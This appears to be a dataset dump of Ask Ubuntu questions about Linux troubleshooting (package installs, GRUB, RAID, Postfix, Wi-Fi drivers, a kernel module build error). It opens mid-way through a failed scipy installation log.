'/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1530 : userwarning : blas ( http : //www.netlib.org/blas/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ blas ] ) or by setting the blas environment variable . warnings.warn ( blasnotfounderror.__doc__ ) blas_src_info : not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1533 : userwarning : blas ( http : //www.netlib.org/blas/ ) sources not found . directories to search for the sources can be specified in the numpy/distutils/site.cfg file ( section [ blas_src ] ) or by setting the blas_src environment variable . warnings.warn ( blassrcnotfounderror.__doc__ ) traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 237 , in < module > setup_package ( ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 234 , in setup_package setup ( **metadata ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/core.py '' , line 135 , in setup config = configuration ( ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 173 , in configuration config.add_subpackage ( 'scipy ' ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 966 , in add_subpackage caller_level = 2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 935 , in get_subpackage caller_level = caller_level + 1 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 872 , in _get_configuration_from_setup_py config = setup_module.configuration ( *args ) file `` scipy/setup.py '' , line 12 , in configuration config.add_subpackage ( 'integrate ' ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 966 , in add_subpackage caller_level = 2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 935 , in get_subpackage caller_level = caller_level + 1 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 872 , in _get_configuration_from_setup_py config = setup_module.configuration ( *args ) file `` scipy/integrate/setup.py '' , line 12 , in configuration blas_opt = get_info ( 'blas_opt ' , notfound_action=2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py '' , line 350 , in get_info return cl ( ) .get_info ( notfound_action ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py '' , line 509 , in get_info raise self.notfounderror ( self.notfounderror.__doc__ ) numpy.distutils.system_info.blasnotfounderror : blas ( http : //www.netlib.org/blas/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ blas ] ) or by setting the blas environment variable . complete output from command /home/user/dropbox/thesis/matplotlib_1.1.1/env/bin/python -c `` import setuptools , tokenize ; __file__='/home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-uso4f_-record/install-record.txt -- single-version-externally-managed -- compile -- install-headers /home/user/dropbox/thesis/matplotlib_1.1.1/env/include/site/python2.7 : blas_opt_info : blas_mkl_info : libraries mkl , vml , guide not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available openblas_info : libraries not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available atlas_blas_threads_info : setting ptatlas=atlas libraries ptf77blas , ptcblas , atlas not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available atlas_blas_info : libraries f77blas , cblas , atlas not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1521 : userwarning : atlas ( http : //math-atlas.sourceforge.net/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ atlas ] ) or by setting the atlas environment variable . warnings.warn ( atlasnotfounderror.__doc__ ) blas_info : libraries blas not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1530 : userwarning : blas ( http : //www.netlib.org/blas/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ blas ] ) or by setting the blas environment variable . warnings.warn ( blasnotfounderror.__doc__ ) blas_src_info : not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1533 : userwarning : blas ( http : //www.netlib.org/blas/ ) sources not found . directories to search for the sources can be specified in the numpy/distutils/site.cfg file ( section [ blas_src ] ) or by setting the blas_src environment variable . warnings.warn ( blassrcnotfounderror.__doc__ ) traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 237 , in < module > setup_package ( ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 234 , in setup_package setup ( **metadata ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/core.py '' , line 135 , in setup config = configuration ( ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py '' , line 173 , in configuration config.add_subpackage ( 'scipy ' ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 966 , in add_subpackage caller_level = 2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 935 , in get_subpackage caller_level = caller_level + 1 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 872 , in _get_configuration_from_setup_py config = setup_module.configuration ( *args ) file `` scipy/setup.py '' , line 12 , in configuration config.add_subpackage ( 'integrate ' ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 966 , in add_subpackage caller_level = 2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 935 , in get_subpackage caller_level = caller_level + 1 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/misc_util.py '' , line 872 , in _get_configuration_from_setup_py config = setup_module.configuration ( *args ) file `` scipy/integrate/setup.py '' , line 12 , in configuration blas_opt = get_info ( 'blas_opt ' , notfound_action=2 ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py '' , line 350 , in get_info return cl ( ) .get_info ( notfound_action ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py '' , line 509 , in get_info raise self.notfounderror ( self.notfounderror.__doc__ ) numpy.distutils.system_info.blasnotfounderror : blas ( http : //www.netlib.org/blas/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ blas ] ) or by setting the blas environment variable . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... removing temporary dir /home/user/dropbox/thesis/matplotlib_1.1.1/env/build ... command /home/user/dropbox/thesis/matplotlib_1.1.1/env/bin/python -c `` import setuptools , tokenize ; __file__='/home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-uso4f_-record/install-record.txt -- single-version-externally-managed -- compile -- install-headers /home/user/dropbox/thesis/matplotlib_1.1.1/env/include/site/python2.7 failed with error code 1 in /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy exception information : traceback ( most recent call last ) : file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/pip/basecommand.py '' , line 122 , in main status = self.run ( options , args ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/pip/commands/install.py '' , line 283 , in run requirement_set.install ( install_options , global_options , root=options.root_path ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/pip/req.py '' , line 1435 , in install requirement.install ( install_options , global_options , *args , **kwargs ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/pip/req.py '' , line 706 , in install cwd=self.source_dir , filter_stdout=self._filter_install , show_stdout=false ) file `` /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/pip/util.py '' , line 697 , in call_subprocess % ( command_desc , proc.returncode , cwd ) ) installationerror : command /home/user/dropbox/thesis/matplotlib_1.1.1/env/bin/python -c `` import setuptools , tokenize ; __file__='/home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-uso4f_-record/install-record.txt -- single-version-externally-managed -- compile -- install-headers /home/user/dropbox/thesis/matplotlib_1.1.1/env/include/site/python2.7 failed with error code 1 in /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy so , how can i install that scipy on virtualenv ?
496490	missing update manger & setting in ubuntu 14.04 !	after upgrading from ubuntu 12.04 to 14.04 i could n't log to ubuntu any more -when i tried to login it said : failed to start session , after searching i tried sudo apt-get install ubuntu-desktop fortunately it worked and now i can log in . my problem now is that i 'm missing update manger & setting ! i will be glad if anyone can help .
496494	how to ask which virtualbox version in terminal	i would like to detect the virtualbox version in terminal . the output i want to use in an other program . i tried : virtualbox -- help does not have a -- version option . which virtualbox returns : /usr/bin/virtualbox looking in that file does not help me much dkpg -- list | grep virtualbox does return for me four different versions . i upgraded virtualbox a few times . so how can i retrieve the version in terminal ?
496495	can a ppa repository be added to /etc/apt/source.list ?	by sudo add-apt-repository ' < deb url codename component > ' , a repository is added to the /etc/apt/source.list file . by sudo add-apt-repository ppa : < user > / < ppa-name > , i saw that all the ppa repositories are added to /etc/apt/source.list.d dir : $ ls /etc/apt/sources.list.d/ ferramroberto-sopcast-precise.list ferramroberto-sopcast-precise.list.save google-talkplugin.list google-talkplugin.list.save kalakris-okular-precise.list kalakris-okular-precise.list.save linrunner-thinkpad-extras-precise.list linrunner-thinkpad-extras-precise.list.save precise-partner.list precise-partner.list.save staticfloat-julia-deps-precise.list staticfloat-juliareleases-precise.list staticfloat-juliareleases-precise.list.save telepathy-ppa-precise.list telepathy-ppa-precise.list.save ubuntu-wine-ppa-precise.list ubuntu-wine-ppa-precise.list.save venerix-blug-precise.list venerix-blug-precise.list.save can a ppa repositories be added to the end of /etc/apt/source.list file , instead ? why are ppa repositories are treated differently from nonppa ones ? are there other nonppa repositories treated similarly as ppa ones ? will `sudo add-apt-repository '' add a ppa repository to /etc/apt/source.list , or to some files under /etc/apt/source.list.d ?
496496	postfix suggests a bunch of other packages on install.what are they and should i install them ?	postfix suggests these packages on install : procmail postfix-mysql postfix-pgsql postfix-ldap postfix-pcre sasl2-bin dovecot-common postfix-cdb postfix-doc i know what procmail and dovecot are . it 's the rest i 'd like to know about . info about my server : it 's a vps and i am the only user . i have multiple domains . i plan to use user accounts for email addresses because that sounded simplest . so these would be my email addresses : me @ domain1.com , me @ domain2.com , etc . i set up an mx record pointing at my server 's ip address which is mail.mydomain.com . ( there is no corresponding mail subdomain , that 's just the address of the mx record . ) any help would be greatly appreciated . if you have a suggestion on whether to use dovecot or procmail , that would be appreciated also .
496499	logging state changes of ethernet links	i have two ethernet connections ( eth0 & eth1 ) that are bonded to bond0 . i want to log ( or look if they already exist ) the state changes of any of these 3 interfaces . i want historical information and not current information . i can only find older threads pertaining to the logging and none have answered my question . these interfaces are manually configured . i am not using networkmanager i have searched all of the log files in /var/log without success . maybe i have to turn the logging on to see it in a file like syslog ? how can i log ethernet link changes ?
496500	'javac not found ' error	first i am typing the program then save it to the folder named nimmi as label.java , then i am opening terminal and type the following command : cd nimmi javac label.java to compile , but `` javac not found '' message is displayed . what is wrong ?
496501	how to install ubuntu without formatting hdd	i 'm a windows user.but for now i want to shift into ubuntu . i have many personal data in my hdd . i 'm afraid , what if my hdd gets formatted and i loose all my data . what can i do in in order to install ubuntu wihout loosing my windows parition ?
496504	fully recovering hdds after using of raid controller	i 've been using ubuntu for a year . but today happened something awful to me . i bought four-core amd computer to do some virtuals there . but , i had wanted to reduce the risk and found motherboard raid controller supported . everything was ok , untill my boss decided to upgrade 13.10 to 14.04 . during upgrading from 13.10 to 14.04 some programs and scripts failed to install . after rebooting sidebar was missing . i tried some tricks i found in internet , but the result was n't changed . while i was wondering how to recover my ubuntu 13.10 , my boss offer me do install win7 x64 , and when i did it , loading driver folder did not work . the driver was not found on factory cd with asrock extreme4+ 2a88m mainboard . and now ... i 'm wondering how to fully restore my pc configuration to it 's default values befere setting up raid controller . can anyone help me with that ?
496505	fatal : role `` roelof '' does not exist	i did install postgresql according to the manual . but as soon as i do rails server i see the above error . roelof edit 1 : the sudo -u postgres createuser roelof did the trick but now when i do rake db : create i see this errror message : pg : :insufficientprivilege : error : permission denied to create database
496506	updating firefox via pop-up prompt ?	firefox is prompting me for an update . i am used to a windows environment , so is this the same thing ? if i accept , it will simply update and i do n't need to worry about a thing ? i worry if firefox knows the update is a linux update and not a windows one ? also , can you make your answer applicable to debian as well as ubuntu ? thanks .
496507	remove non-existent windows loader from grub	when i run update-grub on ubuntu 12.04 on my system , i get the following output : found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 what bugs me is the windows 7 loader . /dev/sda indeed had windows 7 on it previously . however , my goal was to complete erase that . during install , i deleted the partition table and created two partitions on each drive for raid 1 . so now i got : md1 : active raid1 sdb2 [ 1 ] sda2 [ 0 ] 1855727424 blocks super 1.2 [ 2/2 ] [ uu ] md0 : active raid1 sdb1 [ 1 ] sda1 [ 0 ] 97589120 blocks super 1.2 [ 2/2 ] [ uu ] md0 = / and md1 = /home , both formatted with ext4 . why grub keeps insisting that there is a windows 7 loader is beyond me . where is this loader located and how can i get rid of it ?
496513	authentication failure while updating	after it downloaded the file , it reports an authentication failure and skips to the next task . after finishing all downloads it reports that i should check my internet connection . just to make sure , i ran update-manager from terminal but still the same problem persisted . result of apt-get upgrade : e : failed to fetch http : //ubuntu.01link.hk/pool/main/a/app-install-data-ubuntu/app-install-data_14.04.1_all.deb hash sum mismatch e : failed to fetch http : //ubuntu.01link.hk/pool/main/s/software-center/software-center_13.10-0ubuntu4.1_all.deb hash sum mismatch
496520	vim installation in ubuntu 14.04	i am unable to install vim and need help . i 've tried the following : root @ cbitlab1 : /home/cbitlib1 # sudo -s root @ cbitlab1 : /home/cbitlib1 # apt-get install vim reading package lists… done building dependency tree reading state information… done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package ‘vim’ has no installation candidate how do i fix this - i 'm on 14.04 .
496521	screen flash in 14.04	after i choose to boot ubuntu in grub my screen will go black and flash white just once and then begin to load ubuntu . this also happened when i had 12.04 installed but i never worried about it till now . i have an asus r503u and it has 4gb ram with amd radeon hd 7340 graphics processor and 1366x768 ( hd ) resolution . i have already done some research and one post said that it is just a graphics thing and i should n't be concerned about it .
496524	how to set low battery sound alert ?	i am using ubuntu 14.04 . mostly i study from e-books , so i read e-books in fullscreen or play games in fullscreen . how to set a sound alert for low battery ?
496530	ubuntu htpc unable to resolve by hostnames	i have a htpc setup using 12.04 . it has been running in this exact same configuration for a couple of years now - this is not a new system and no changes were made to the system prior to the issue happening . last night i was able to watch my nas-stored shows just fine . i wake up this morning to find a couple of failed downloads , with the failed reason being that the downloader could not create the files on the nas . i start checking in and realise that the nas is not mounted on the htpc like normal . i try mounting it and and get the errors of being unable to resolve the various hostnames that i have been using for two years . i checked a little more and am unable to access my router via hostname in the browser , nor can i ping anything via hostname on the command line . so this computer has randomly decided to stop recognising lan hostnames , which every other device in my network can still access without issue . the htpc can ping itself via its own hostname , at least . looking for next steps in troubleshooting to see what is going on . thanks ! more info : i was just looking at my routers for anything weird . i run two routers , one has nat/dhcp disabled to act as a simple switch and wifi repeater ; the htpc in question is connected via ethernet to the switch-router , along with one other hard wired device , my rpi . the rpi shows up on the device list for both the switch-router and main router . the htpc only shows up on the main router , despite being plugged into the switch-router .
496531	refit menu not identifying os	i tried to set up a tri-boot system for my mac ( osx , ubuntu 14.04 , windows 8.1 ) , but refit is unable to identify ubuntu and shows unknown os icon instead . it also shows multiple icons for ubuntu and windows . heres what partition inspector says *** report for internal hard disk *** current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 399984823 mac os x hfs+ 3 399984824 401254359 mac os x boot 4 401254400 401516543 ms reserved 5 401516544 460109823 basic data 6 460110248 489407119 unknown 7 489669264 490234711 linux swap current mbr partition table : # a start lba end lba type 1 1 409639 ee efi protective 2 * 409640 399984823 af mac os x hfs+ 3 399984824 401254359 af mac os x hfs+ 4 401254400 401516543 da unknown mbr contents : boot code : unknown , but bootable partition at lba 40 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 1 , type efi system ( fat ) partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 2 , type mac os x hfs+ listed in mbr as partition 2 , type af mac os x hfs+ , active partition at lba 399984824 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 3 , type mac os x boot listed in mbr as partition 3 , type af mac os x hfs+ partition at lba 401254400 : boot code : none file system : unknown listed in gpt as partition 4 , type ms reserved listed in mbr as partition 4 , type da unknown partition at lba 401516544 : boot code : windows bootmgr ( vista ) file system : ntfs listed in gpt as partition 5 , type basic data partition at lba 460110248 : boot code : none file system : ext4 listed in gpt as partition 6 , type unknown partition at lba 489669264 : boot code : none file system : unknown listed in gpt as partition 7 , type linux swap
496533	how to integrate postfix/dovecote with windows ad	i have postfix/dovecote ubuntu server and it 's working fine , also i have active directory windows 2008 , i want to make email clients to get authenticated from windows ad and automatically create in-box for all ad users as i use ms-exchange server , is it possible ?
496535	how to install starry night on ubuntu	i wish to install starry night on ubuntu 14.04 lts . which is the safest way to install this useful application ?
496536	looking for some starter help for ubuntu package building	so far i have followed and understand the ubuntu packaging guide and have skimmed through the debian maintainers guide a bit . my question comes down to making my package outside of the normal cookie-cutter ./configure , make , make install paradigm of the ubuntu guide . i am recompiling xbmc , and there is a bootstrap sequence in there , that obviously then falls out of the 1.2.3 process normally achieved . can someone , at the minimum point me into the right doc on the debian maintainer guide where i can parse more than the regular `` ./configure , make , make install '' or link to a handy reference guide ? maybe it 's as simple as getting to know the makefile process more . i 'm a bit new at creating these packages , aside from repacking existing debs . please also see my reference reddit post : http : //www.reddit.com/r/ubuntu/comments/2aezct/looking_for_some_starter_help_for_ubuntu_package/
496538	sed `` permission denied '' and `` no such file or directory '' errors while building clockwordmod	whenever i execute the command build/tools/device/mkvendor.sh samsung_aegis2vzw /your/path/to/the/boot.img i get this as the output build/tools/device/mkvendor.sh : line 83 : /sedcommand : permission denied sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory sed : -e expression # 1 , char 15 : unknown option to `s' sed : could n't open file /sedcommand : no such file or directory how to fix this error ?
496543	will an ubuntu live usb be able to access a windows raid 10 ?	my windows will not boot , so i want to recover the files and reinstall . i 've tried two different version of linux ( an old ubuntu 7.10 disc and a puppy linux boot usb ) , but neither appears to be able to see the raid 10 to mount it . if i create a boot usb with the current distro , will i be able to mount the raid and transfer to an external ? thanks !
496546	i ca n't access windows 7 dual boot with 12.04	i 'm hoping it 's not all gone . i have tried boot-repair -- http : //paste.ubuntu.com/7780801/ i had a windows recovery partition , but i ca n't access that . only ubuntu in grub . gparted screenshot : http : //imgur.com/qyglkfs
496547	which version of tweak tool suitable for 14.04 lts ?	which version of unity tweek tool for ubuntu 14.04 lts . i 've tried gnome tweek tool.deb it said dependency is not satisfiable : gnome-shell-common ( = > 3.4 )
496549	error : : you must put some 'source ' uris in your sources.list	i 'm trying to install pil a python module on ubuntu i first need to install a package called python-imaging using the following command sudo apt-get build-dep python-imaging when i try and do this i get the error e : you must put some 'source ' uris in your sources.list i saw this question whihc shows how to fix via the gui but i 'm using the command line . does anyone know how i can fix this error.. ? update : based on the below answers i 've updated my package list but i now get this error . not sure if it is related , if not i 'll start a new question as i ca n't find reference to the error anywhere . e : build-depends dependency for python-imaging can not be satisfied because candidate version of package python-all-dev ca n't satisfy version requirements
496552	how to develop applications for ubuntu software center ?	i 'm learning python . i have completed first three tutorials recommended by official python page . what are the best steps for me to continue ? should i just continue learning python ? should i start learning working in some gui ide and , if yes , which one ? or it is recommended for me to do something else ? as mentioned in title , i want to learn developing apps for ubuntu software center .
496553	homepage disappeared from firefox	the usual modified google homepage for mozilla firefox has disappeared . now , when i start browser it says browser.startup.homepage=about : home and the address link is chrome : //branding/locale/browserconfig.properties . how to bring my modified google homepage back ?
496557	vlc fails to play wmv files in 14.04	i have installed vlc from the software center . in its description , it says that it plays wmv files , but when i try to play one , it does n't play it . the vlc window just opens for a fraction of a second and closes back . i have no problem with any other file , but wmv does n't play . i tried delving for good helpful solution , but nothing worked out . finally , this was the best place to get my problem solved . i uninstall and reinstalled vlc but it di n't work any good .
496561	problems with 5 ghz wifi	i have a tp-link tl-wdn4200 dual band wifi card with the ralink rt3573 chipset . on ubuntu 14.04 , the default driver was the rt2800 which does not support dual band . i compiled the rt3573 drivers and installed the module and it seems to be running . the problem is that when it 's connected to 5 ghz , it 's incredibly slow . most of the time websites refuse to load . i blacklisted the old drivers but i do n't know what to do anymore . any help would be greatly appreciated .
496563	does anyone know where is the program folder for stepmania ?	i have sm-ssc 5 installed , i want to add themes , noteskins , courses , chatacter , etc . for the songs , i knew that we can put thr songs in /home/ < users > /.stepmania 5.0 but i want to customize more to make the stepmania fit with the songs and modes ( such as , dance , beat , pump , etc . ) , so does anyone knows where is the program folder for stepmania ? edit 1 : i mean data folder/obb folder/anything
496565	ubuntu server 14.04 kernel panic at boot	since when i installed netatalk on ubuntu server 14.04 i get a kernel panic at boot . i think netatalk is the cause because i can see the word `` appletalk '' many times in the kernel panic screen . i 've also changed both my ram modules and checked my hdd , cpu and gpu to be sure that the kernel panic was not caused by a hardware failure . i tried booting with a different kernel and the situation did n't change , while booting in rescue mode did n't result in a kernel panic . however , i got a kernel panic even in rescue mode after issuing the dpkg -- configure -a command . i really do n't know what to do and i do n't understand much from the kernel panic screen . here is it ; i hope you can help me . thank you . http : //i.stack.imgur.com/8sczf.jpg
496569	delete files on hdd while using livecd	i 've got a little problem . after installing the latest upadates ubuntu 13.10 ( iirc ) and rebooting , i can access the gui log-in interface , but after entering my password the monitor remains black with the cursor in the middle . i can move it though , but nothing more happens . since i knew there was pretty less space available , i think the problem might be that the harddrive is just full and therefore ubuntu ca n't be loaded fully . i now made a livecd and booted from it . everything went fine and i can access the hdd and see most of the folders . here comes the tricky part . if i want to open a folder at one point i get the notification that i do n't have the permission to access this folder or file . the plan was to use the livecd to access the files and delete some to free some space and then reboot . since this is n't working i do n't know what to do anymore . thanks in advance for your help . cheers update 1 : when i look at ls -l the output of some of the directories which i then ca n't access is drwx -- -- --
496572	error while moving information from my sd-card , how can i fix it ?	i have a 32gb kingston microsd . i have the following message when i try to move a dir : error while moving . there was an error getting information about the files in the folder â0â . error when getting information for file '/media/victor/tel/0/trabajo ' : input/output error` how can i move the contents into my desktop ?
496573	unable to mount wd my book on 14.04	i broke my ubu system few days ago and accidentally formatted the drive with valuable data on . we have been able to recover the data on macbook and transfer them to my book . but anything i tried could n't get it to mount . this is what i get when typing sudo mount /dev/sdc1 /mnt -t ntfs-3g -o rw , users , umask=000 ntfs signature is missing . failed to mount '/dev/sdc1 ' : nepřípustný argument the device '/dev/sdc1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? how to mount the drive ? thanks
496574	unify windows and ubuntu boot managers	i ran into some trouble trying to start ubuntu 14 in a new laptop with windows 8.1 preinstalled . however , the booting process is kind of uncomfortable now . when i start the laptop first i can see the windows boot manager with windows 8.1 as the only option . then , i found out that pressing esc leads to grub , and then i can run ubuntu . i do n't know how this happened , but after hours trying to be able to start ubuntu unsuccessfuly now i am more than happy . so now i just want to have both options ( and future options ) in the same boot manager , i honestly do n't care if it 's the windows boot manager or grub . i tried following this answer but it did n't work . what can i do ?
496575	inserting own module in linux kernel	i am trying to insert module in the kernel but it shows error . i made the c file as : # include `linux/init.h` # include `linux/module.h` static int hello_init ( void ) { printk ( kern_alert `` test : hello world , this is soliduscode\n '' ) ; return 0 ; } static void hello_exit ( void ) { printk ( kernel_alert `` test : good bye , from soliduscode '' ) ; } module_init ( hello_init ) ; module_exit ( hello_exit ) ; i made makefile as : obj-m += hello.o all : make −c /lib/modules/ $ ( shell uname −r ) /build m= $ ( pwd ) modules clean : make −c /lib/modules/ $ ( shell uname −r ) /build m= $ ( pwd ) clean when i apply the make command in terminal it shows error as : harshil @ denker : ~/modules $ make uname : extra operand ‘−r’ try 'uname -- help ' for more information . uname : extra operand ‘−r’ try 'uname -- help ' for more information . make : nothing to be done for `all ' .
496577	determine time and length of last suspend	i would like to know time and length of last system suspend . is it possible ? edit dmesg | grep -a10 suspend [ 27075.428135 ] pm : suspend of devices complete after 998.769 msecs [ 27075.432139 ] pm : late suspend of devices complete after 4.000 msecs [ 27075.432325 ] r8169 0000:02:00.0 : system wakeup enabled by acpi [ 27075.448098 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi [ 27075.452115 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi [ 27075.460035 ] xhci_hcd 0000:00:14.0 : system wakeup enabled by acpi [ 27075.464397 ] pm : noirq suspend of devices complete after 32.255 msecs [ 27075.464646 ] acpi : preparing to enter system sleep state s3 [ 27075.464873 ] pm : saving platform nvs memory [ 27075.465405 ] disabling non-boot cpus ... [ 27075.466662 ] kvm : disabling virtualization on cpu1 [ 27075.568014 ] smpboot : cpu 1 is now offline [ 27075.569471 ] kvm : disabling virtualization on cpu2 [ 27075.672016 ] smpboot : cpu 2 is now offline [ 27075.673417 ] kvm : disabling virtualization on cpu3 [ 27075.776020 ] smpboot : cpu 3 is now offline [ 27075.777422 ] kvm : disabling virtualization on cpu4 [ 27075.880019 ] smpboot : cpu 4 is now offline [ 27075.881376 ] kvm : disabling virtualization on cpu5 [ 27075.984012 ] smpboot : cpu 5 is now offline [ 27075.984393 ] broke affinity for irq 23 [ 27075.985396 ] kvm : disabling virtualization on cpu6 [ 27076.088010 ] smpboot : cpu 6 is now offline [ 27076.089372 ] kvm : disabling virtualization on cpu7 [ 27076.192012 ] smpboot : cpu 7 is now offline [ 27076.192213 ] acpi : low-level resume complete [ 27076.192213 ] pm : restoring platform nvs memory
496581	fresh install of postfix can send mail but not receive it . which setting to tweak to receive mail ?	my server is a vps ; i 'm the only user on it . although i 'd eventually like to have multiple emails for my multiple domains , today i 'd be happy to be able to receive mail on just one . could someone tell me the settings that directly affect incoming mail ? just those settings , so hopefully i can go through them one by one until i find the fix . i 'll also post my config files if that helps .
496582	why ca n't i redirect grep output to file ?	i am running command like this . # ( ( partclone.restore -x -s some.img -o /dev/sda3 2 > & 3 ) 3 > & 1 ) | grep completed completed : 0.40 % completed : 1.23 % completed : 2.07 % ... but i can not direct the output to a file . # ( ( partclone.restore -x -s some.img -o /dev/sda3 2 > & 3 ) 3 > & 1 ) | grep completed > > ./log 2 > & 1 there is nothing in the log file . but something like cat some.file | grep some.string > > ./log works fine . why ?
